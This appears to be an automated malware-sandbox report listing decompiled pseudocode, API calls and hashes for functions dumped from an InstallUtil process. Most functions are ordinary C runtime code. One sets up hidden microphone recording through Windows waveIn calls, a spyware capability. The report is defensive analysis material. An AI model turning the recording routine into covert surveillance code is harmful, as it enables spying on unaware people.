Uniqueness

Uniqueness Score: -1.00%

Function 0043FED8 Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0043FED8(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46c00c; // 0xe1ce05e9
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0043F249( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00430E4E(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00430E4E(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00430E4E(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0044B846(_t56);
						_t40 = E004427C2(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0044B846(_t56);
						E004427C2(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46c00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x0043fed8
0x0043fee2
0x0043fee6
0x0043fee8
0x0043feec
0x0043fef6
0x0043ff07
0x0043ff0c
0x0043ff0e
0x0043ff10
0x0043ff12
0x0043ff14
0x0043ff18
0x0043ffd2
0x0043ffe0
0x0043ffe2
0x0043ffe7
0x0043ffee
0x0043fff0
0x0043fffe
0x0044000d
0x00440010
0x00440012
0x00000000
0x00440013
0x0043ff20
0x0043ff25
0x0043ff2a
0x0043ff2c
0x0043ff2c
0x0043ff2e
0x0043ff33
0x0043ff37
0x0043ff37
0x0043ff3a
0x0043ff59
0x0043ff59
0x0043ff5b
0x0043ff5e
0x0043ff67
0x0043ff6a
0x0043ff6f
0x0043ff72
0x0043ff77
0x00000000
0x00000000
0x0043ff79
0x00000000
0x0043ff3c
0x0043ff3c
0x0043ff3e
0x0043ff47
0x0043ff4a
0x0043ff4f
0x0043ff52
0x0043ff57
0x0043ff81
0x0043ff84
0x0043ff86
0x0043ff89
0x0043ff91
0x0043ff97
0x0043ff9e
0x0043ffa0
0x0043ffa8
0x0043ffb7
0x0043ffbb
0x0043ffbd
0x0043ffc0
0x00000000
0x00000000
0x0043ffc2
0x0043ffc5
0x0043ffc7
0x0043ffc7
0x0043ffc8
0x0043ffca
0x0043ffcd
0x00000000
0x0043ffc7
0x00000000
0x0043ff57
0x0043ff3a
0x00000000

APIs

_free.LIBCMT ref: 0043FF4A
_free.LIBCMT ref: 0043FF6A

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: daa148ccdb97df139992e18a93984b8390268eb3a8fbf8971ed888717db180ea
Instruction ID: fd9f9c647713014b17a486929e2dfe3b3c96fd0e60310b06c9fe60c82463fad1
Opcode Fuzzy Hash: daa148ccdb97df139992e18a93984b8390268eb3a8fbf8971ed888717db180ea
Instruction Fuzzy Hash: E941E236F002009FDB20DF79C881A5AB7A5EF89314F2545AAEA05EB381E735ED05CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0044CE9D Relevance: 7.6, APIs: 5, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E0044CE9D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t34 ^ _t70;
				E004370F7(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E004318FB(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E004337A0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00432753(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E004421F7(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00452F00();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x0044cea5
0x0044ceac
0x0044ceb8
0x0044cebd
0x0044cec2
0x0044cec7
0x0044ceca
0x0044cecc
0x0044cecc
0x0044ced1
0x0044ceea
0x0044cef0
0x0044cef5
0x0044cf94
0x0044cf98
0x0044cf9d
0x0044cf9d
0x0044cfb9
0x0044cfb9
0x0044cefb
0x0044cf03
0x0044cf07
0x0044cf53
0x0044cf55
0x0044cf57
0x0044cf5c
0x0044cf73
0x0044cf7b
0x0044cf8b
0x0044cf8b
0x0044cf7b
0x0044cf8d
0x0044cf8e
0x00000000
0x0044cf93
0x0044cf0e
0x0044cf10
0x0044cf12
0x0044cf1a
0x0044cf37
0x0044cf41
0x0044cf46
0x00000000
0x00000000
0x0044cf48
0x0044cf4e
0x0044cf4e
0x00000000
0x0044cf4e
0x0044cf1e
0x0044cf22
0x0044cf27
0x0044cf2b
0x00000000
0x00000000
0x0044cf2d
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00438A81,?,00000000,?,00000001,?,?,00000001,00438A81,?), ref: 0044CEEA
__alloca_probe_16.LIBCMT ref: 0044CF22
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044CF73
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004377DF,?), ref: 0044CF85
__freea.LIBCMT ref: 0044CF8E

Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 50b51c4a191b6d1fe6e0c006c40ae766f54e5027bae194a81e30d446e4e34767
Instruction ID: 507319d0262b13adbb6a0aec4035fc08de50ff3dfea07886d4c571385026ad11
Opcode Fuzzy Hash: 50b51c4a191b6d1fe6e0c006c40ae766f54e5027bae194a81e30d446e4e34767
Instruction Fuzzy Hash: 4B31F032A0120AABEF249F65CC81DAF7BA6EF44314F08416AFC14D6290E73DCD54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401BA9 Relevance: 7.6, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401BA9(void* __eflags) {
				signed short _t3;
				signed int _t7;
				signed int _t15;
				signed int _t24;
				signed int _t25;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;

				_t35 = __eflags;
				CreateDirectoryW(E00401EC4(0x46e0d8), 0);
				_t3 = 8;
				 *0x46daa6 = _t3;
				 *0x46da9c = 0x1f40;
				 *0x46daa0 = 0x1f40;
				0x46da98->wFormatTag = 1;
				 *0x46da9a = 1;
				 *0x46daa4 = 1;
				 *0x46daa8 = 0;
				_t7 = E004383EC(_t5, E00401F6B(E00401E25(0x46e600, 1, _t33, _t35, 0x24)));
				_t24 =  *0x46da9c; // 0x0
				 *_t34 = 0x30008;
				_t25 = _t24 * _t7 * 0x3c;
				 *0x46daac = _t25;
				 *0x46dab4 = (( *0x46daa6 & 0x0000ffff) >> 3) * _t25;
				waveInOpen(0x46dab0, 0xffffffff, 0x46da98, E00401CCB, 0, ??);
				E00401F5D( *0x46dab4);
				0x46da78->lpData = E00401F6B(0x46e0f0);
				_t15 =  *0x46dab4; // 0x0
				 *0x46da7c = _t15;
				 *0x46da80 = 0;
				 *0x46da84 = 0;
				 *0x46da88 = 0;
				 *0x46da8c = 0;
				waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20);
				waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
				waveInStart( *0x46dab0);
				return 0;
			}

0x00401ba9
0x00401bb9
0x00401bc1
0x00401bc7
0x00401bcf
0x00401bd6
0x00401bde
0x00401bec
0x00401bf3
0x00401bfa
0x00401c0d
0x00401c12
0x00401c1b
0x00401c2d
0x00401c44
0x00401c4a
0x00401c4f
0x00401c62
0x00401c75
0x00401c7a
0x00401c86
0x00401c8b
0x00401c91
0x00401c97
0x00401c9d
0x00401ca3
0x00401cb2
0x00401cbe
0x00401cc8

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BB9
waveInOpen.WINMM(0046DAB0,000000FF,0046DA98,Function_00001CCB,00000000,00000000,00000024), ref: 00401C4F
waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401CA3
waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401CB2
waveInStart.WINMM ref: 00401CBE

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 803c58fd5ec0f152acb46d0bcf94c60bbae932a42975322718757f75c1d9126e
Instruction ID: 344ad851c8734cbc447b0f39cf142e8bb944ec66090ee7ce45137a1dd74808b0
Opcode Fuzzy Hash: 803c58fd5ec0f152acb46d0bcf94c60bbae932a42975322718757f75c1d9126e
Instruction Fuzzy Hash: 7F214871F5C2109BC704AFF6AD15A1A7AA9EF99305700543BF509DBAB1FBF844028B4E

Uniqueness

Uniqueness Score: -1.00%

Function 0044B0CB Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044B0CB() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0044B094(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E004421F7(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E004427C2(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0044b0da
0x0044b0e0
0x0044b138
0x0044b138
0x0044b0e2
0x0044b0e3
0x0044b0e8
0x0044b0f1
0x0044b0f7
0x0044b0fd
0x0044b102
0x00000000
0x0044b104
0x0044b10a
0x0044b10f
0x0044b12d
0x0044b127
0x0044b127
0x0044b129
0x0044b129
0x0044b130
0x0044b135
0x0044b102
0x0044b13c
0x0044b13f
0x0044b13f
0x0044b14d

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044B0D4
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044B0F7

Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044B11D
_free.LIBCMT ref: 0044B130
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044B13F

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 53aa8d83d0339acc2514fb8208e7d5ce801016b9814cce6c2346f504b3f2f8cf
Instruction ID: 9d8d00510a03bc05891748290634c4512af5014b8bd0b14bce7efc407fefd574
Opcode Fuzzy Hash: 53aa8d83d0339acc2514fb8208e7d5ce801016b9814cce6c2346f504b3f2f8cf
Instruction Fuzzy Hash: E401B1626027107F33211ABA5C9CC7BBA6CDAC2BE5715012AFA04D6241EF68CD0291F8

Uniqueness

Uniqueness Score: -1.00%

Function 004442D9 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E004442D9(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46c1cc; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E00441BB3(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E00444852(_t13, _t16, __eflags,  *0x46c1cc, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E004440C7(_t13, _t15, 0x46d654);
							E004427C2(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E004427C2();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E004447FC(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x004442d9
0x004442e4
0x004442e6
0x004442e8
0x004442ed
0x004442f0
0x004442fe
0x0044430a
0x0044430d
0x00444310
0x00444322
0x00444327
0x00444329
0x00444334
0x0044433a
0x00444342
0x00444344
0x00000000
0x00000000
0x00000000
0x00000000
0x0044432b
0x0044432b
0x00000000
0x0044432b
0x00444312
0x00444312
0x00444313
0x00444313
0x00444346
0x00444347
0x00444347
0x004442f2
0x004442f8
0x004442fc
0x0044434f
0x00444350
0x00444356
0x00000000
0x00000000
0x00000000
0x004442fc
0x0044435d

APIs

GetLastError.KERNEL32(0000000A,0000000B,0000000A,00439946,0043DC1B,00000000,?,?,?,?,0043DDFE,00000000,0000000A,000000FF,0000000A,00000000), ref: 004442DE
_free.LIBCMT ref: 00444313
_free.LIBCMT ref: 0044433A
SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00444347
SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00444350

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 21cc67832f72140f8428115ceb9f326a0f4a24013c8998ebd3c45c346cdaa388
Instruction ID: 009ada4f88036a76875dba4f910c65447b3cae8e4b97b3a0ee7c4c33a86d7d5c
Opcode Fuzzy Hash: 21cc67832f72140f8428115ceb9f326a0f4a24013c8998ebd3c45c346cdaa388
Instruction Fuzzy Hash: 5301F93630070166F3126A766C86B6B2219DBD2F79735013BF914932A2EFACCC05453D

Uniqueness

Uniqueness Score: -1.00%

Function 0044C72D Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0044C72D(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x46c178; // 0x46c170
					if(_t23 != 0) {
						E004427C2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46c17c; // 0x46d64c
					if(_t24 != 0) {
						E004427C2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46c180; // 0x46d64c
					if(_t25 != 0) {
						E004427C2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46c1a8; // 0x46c174
					if(_t26 != 0) {
						E004427C2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x46c1ac; // 0x46d650
					if(_t27 != 0) {
						return E004427C2(_t6);
					}
				}
				return _t6;
			}

0x0044c733
0x0044c738
0x0044c73c
0x0044c742
0x0044c745
0x0044c74a
0x0044c74e
0x0044c754
0x0044c757
0x0044c75c
0x0044c760
0x0044c766
0x0044c769
0x0044c76e
0x0044c772
0x0044c778
0x0044c77b
0x0044c780
0x0044c781
0x0044c784
0x0044c78a
0x00000000
0x0044c792
0x0044c78a
0x0044c795

APIs

_free.LIBCMT ref: 0044C745

Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA

_free.LIBCMT ref: 0044C757
_free.LIBCMT ref: 0044C769
_free.LIBCMT ref: 0044C77B
_free.LIBCMT ref: 0044C78D

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 94ba95edecf047d7489292863a603b2af803abcef43ad176f9a8dafea2bc29a1
Instruction ID: 9f606833b293b4dbbcb7bea4edcaf54fffb6c9e4ae9b3e4aa72faf3428947d7a
Opcode Fuzzy Hash: 94ba95edecf047d7489292863a603b2af803abcef43ad176f9a8dafea2bc29a1
Instruction Fuzzy Hash: 12F036326056016BB660EB7EF9C6C6773D9EA11B107A8881BF144D7612DBB8FC804E7D

Uniqueness

Uniqueness Score: -1.00%

Function 00440127 Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00440127(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46c990; // 0x11f9910
					if(_t7 != 0x46c770) {
						E004427C2(_t7);
						 *0x46c990 = 0x46c770;
					}
				}
				E004427C2( *0x46da04);
				 *0x46da04 = 0;
				E004427C2( *0x46da08);
				 *0x46da08 = 0;
				E004427C2( *0x46da38);
				 *0x46da38 = 0;
				E004427C2( *0x46da3c);
				 *0x46da3c = 0;
				return 1;
			}

0x00440130
0x00440134
0x00440136
0x00440142
0x00440145
0x0044014b
0x0044014b
0x00440142
0x00440157
0x00440164
0x0044016a
0x00440175
0x0044017b
0x00440186
0x0044018c
0x00440194
0x0044019d

APIs

_free.LIBCMT ref: 00440145

Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA

_free.LIBCMT ref: 00440157
_free.LIBCMT ref: 0044016A
_free.LIBCMT ref: 0044017B
_free.LIBCMT ref: 0044018C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 804531a0752125b40791fc05ebc8707dcaa48543742418257034efaebae2e7fd
Instruction ID: 90a05c473352b48ec0fd53a4167d4b5db266978a4d34a66110c68907f3b6885f
Opcode Fuzzy Hash: 804531a0752125b40791fc05ebc8707dcaa48543742418257034efaebae2e7fd
Instruction Fuzzy Hash: EEF0BEB0F0D1608BA7026F76BCC24143B21F728B28345512BF52486730EBF948408F9F

Uniqueness

Uniqueness Score: -1.00%

Function 004468E3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E004468E3(void* __ebx, void* __edi, void* __esi, signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr _t79;
				signed int _t87;
				signed int _t90;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr _t112;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				void* _t129;

				_t62 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t62 ^ _t128;
				_t110 = _a12;
				_v12 = _t110;
				_t124 = _a4;
				_t121 = _a8;
				_v52 = _t121;
				if(_t110 != 0) {
					__eflags = _t121;
					if(_t121 != 0) {
						_push(__ebx);
						_t106 = _t124 >> 6;
						_t119 = (_t124 & 0x0000003f) * 0x30;
						_v32 = _t106;
						_t66 =  *((intOrPtr*)(0x46d800 + _t106 * 4));
						_v48 = _t66;
						_v28 = _t119;
						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29));
						__eflags = _t107 - 2;
						if(_t107 == 2) {
							L6:
							_t68 =  !_t110;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E00447364(_t124, 0, 0, 2);
									_t129 = _t129 + 0x10;
								}
								_t69 = E00446488(_t107, _t119, __eflags, _t124);
								__eflags = _t69;
								if(_t69 == 0) {
									_t112 =  *((intOrPtr*)(0x46d800 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0);
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										goto L28;
									}
									_t87 = _t107;
									__eflags = _t87;
									if(_t87 == 0) {
										_t38 =  &_v24; // 0x452a45
										E004464FE(_t107, _t121, _t124, _t38, _t124, _t121, _v12);
										goto L17;
									}
									_t90 = _t87 - 1;
									__eflags = _t90;
									if(_t90 == 0) {
										_t36 =  &_v24; // 0x452a45
										_t89 = E004466CB(_t107, _t121, _t124, _t36, _t124, _t121, _v12);
										goto L17;
									}
									__eflags = _t90 != 1;
									if(_t90 != 1) {
										goto L34;
									}
									_t34 =  &_v24; // 0x452a45
									_t89 = E004465DD(_t107, _t121, _t124, _t34, _t124, _t121, _v12);
									goto L17;
								} else {
									__eflags = _t107;
									if(_t107 == 0) {
										_t24 =  &_v24; // 0x452a45
										_t89 = E00446268(_t107, _t121, _t124, _t24, _t124, _t121, _v12);
										L17:
										L15:
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											__eflags = _t74 - _v36;
											L40:
											L41:
											return E004318FB(_v8 ^ _t128);
										}
										_t77 = _v44;
										__eflags = _t77;
										if(_t77 == 0) {
											_t121 = _v52;
											L34:
											_t117 = _v28;
											_t79 =  *((intOrPtr*)(0x46d800 + _v32 * 4));
											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00439941())) = 0x1c;
												_t81 = E0043992E();
												 *_t81 =  *_t81 & 0x00000000;
												__eflags =  *_t81;
												L38:
												goto L40;
											}
											__eflags =  *_t121 - 0x1a;
											if( *_t121 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t126 = 5;
										__eflags = _t77 - _t126;
										if(_t77 != _t126) {
											_t81 = E0043990B(_t77);
										} else {
											 *((intOrPtr*)(E00439941())) = 9;
											 *(E0043992E()) = _t126;
										}
										goto L38;
									}
									__eflags = _t107 - 1 - 1;
									if(_t107 - 1 > 1) {
										goto L34;
									}
									_t22 =  &_v24; // 0x452a45
									E0044641B(_t22, _t121, _v12);
									goto L15;
								}
							}
							 *(E0043992E()) =  *_t97 & 0x00000000;
							 *((intOrPtr*)(E00439941())) = 0x16;
							_t81 = E0043862C();
							goto L38;
						}
						__eflags = _t107 - 1;
						if(_t107 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E0043992E()) =  *_t99 & _t121;
					 *((intOrPtr*)(E00439941())) = 0x16;
					E0043862C();
					goto L41;
				}
				goto L41;
			}

0x004468eb
0x004468f2
0x004468f5
0x004468f8
0x004468fc
0x00446900
0x00446903
0x00446908
0x00446911
0x00446913
0x00446934
0x00446939
0x0044693f
0x00446942
0x00446945
0x0044694c
0x0044694f
0x00446952
0x00446956
0x00446959
0x00446960
0x00446962
0x00446964
0x00446966
0x00446985
0x00446988
0x00446988
0x0044698d
0x00446996
0x0044699b
0x0044699b
0x0044699f
0x004469a5
0x004469a7
0x004469e5
0x004469ec
0x004469ef
0x004469f4
0x00446a43
0x00446a46
0x00446a49
0x00446a55
0x00446a5b
0x00446a5d
0x00446a65
0x00446a65
0x00000000
0x00446a68
0x004469f9
0x004469f9
0x004469fc
0x00446a2f
0x00446a35
0x00000000
0x00446a35
0x004469fe
0x004469fe
0x00446a01
0x00446a1f
0x00446a25
0x00000000
0x00446a25
0x00446a03
0x00446a06
0x00000000
0x00000000
0x00446a0f
0x00446a15
0x00000000
